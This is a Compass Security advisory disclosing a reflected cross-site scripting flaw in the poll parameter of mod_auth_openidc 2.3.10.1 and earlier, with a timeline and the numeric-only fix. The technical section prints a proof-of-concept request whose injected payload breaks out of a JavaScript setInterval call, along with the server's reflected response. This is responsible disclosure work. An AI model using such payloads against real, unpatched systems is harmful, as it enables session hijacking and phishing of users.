####################################################################################################
#
# COMPASS SECURITY ADVISORY 
# https://www.compass-security.com/research/advisories/
#
####################################################################################################
#
# Product: mod_auth_openidc [1]
# Vendor:  ZmartZone IAM [2]
# CSNC ID: CSNC-2019-001
# CVE ID : requested
# Subject: Reflected Cross-Site Scripting (XSS) Vulnerability
# Risk:    High
# Effect:  Remotely exploitable
# Authors: Mischa Bachmann <mischa.bachmann@compass-security.com>
# Date:    2019-02-18
#
####################################################################################################


Introduction:
-------------
mod_auth_openidc is an authentication/authorization module for the Apache 2.x HTTP server that 
functions as an OpenID Connect Relying Party, authenticating users against an OpenID Connect Provider. 
It can also function as an OAuth 2.0 Resource Server, validating OAuth 2.0 bearer access tokens 
presented by OAuth 2.0 Clients [1].

Compass Security Schweiz AG [3] discovered a Reflected Cross-Site Scripting (XSS)
vulnerability in the mod_auth_openidc, potentially resulting in a number of different attack
scenarios such as redirecting the user to a phishing page or interacting with the application 
on behalf of the user.


Affected Versions:
------------------
2.3.10.1 and earlier


Fixed Version:
------------------
2.3.10.2


Technical Description:
----------------------
The mod_auth_openidc OIDCRedirectURI page uses a poll parameter to set the value of a JavaScript function.
It is possible to inject JavaScript code in to the poll parameter which is reflected on the page resulting
in Cross-Site Scripting (XSS)

# HTTP request
GET /oauth2callback?session=iframe_rp&poll=5000)%3b}alert(%27xss%27)%3b{// HTTP/1.1
Host: admin.example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: mod_auth_openidc_session=[CUT]  8a3621b2f87f95cd2afddb0bc652b335=[CUT]; JSESSIONID=[CUT]; c12e669f81a3a26a49084977d4c8d030=[CUT]
Connection: close
Upgrade-Insecure-Requests: 1

# HTTP response
HTTP/1.1 200 OK
Date: Mon, 21 Jan 2019 09:00:39 GMT
Server: Apache
Content-Length: 1548
Connection: close
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title></title>
<script type="text/javascript">
var targetOrigin = 'https://auth.example.com';
var message = '[CUT]' + ' ' + '[CUT]';
var timerID;
function checkSession() {
console.debug('checkSession: posting ' + message + ' to ' + targetOrigin);
var win = window.parent.document.getElementById('openidc-op').contentWindow;
win.postMessage( message, targetOrigin);
}
function setTimer() {
checkSession();
timerID = setInterval('checkSession()', 5000);}alert('xss');{//);
}
function receiveMessage(e) {
console.debug('receiveMessage: ' + e.data + ' from ' + e.origin);
if (e.origin !== targetOrigin ) {
console.debug('receiveMessage: cross-site scripting attack?');
return;
}
if (e.data != 'unchanged') {
clearInterval(timerID);
if (e.data == 'changed') {
window.location.href = 'https://admin.example.com/oauth2callback?session=check';
} else {
window.location.href = 'https://admin.example.com/oauth2callback?session=logout';
}
}
}
window.addEventListener('message', receiveMessage, false);
</script>
</head>
<body onload="setTimer()">
<p></p>
</body>
</html>

Fix:
-------
This issue can be fixed by only allowing numbers for the poll parameter


Timeline:
---------
2019-01-21: Vulnerability discovered by Mischa Bachmann
2019-01-22: Initial vendor notification
2019-01-22: Initial vendor response
2019-01-22: Release of fixed version 2.3.10.2
2019-02-18: Release of advisory


References:
-----------
[1] https://github.com/zmartzone/mod_auth_openidc
[2] https://www.zmartzone.eu/
[3] https://www.compass-security.com/research/advisories/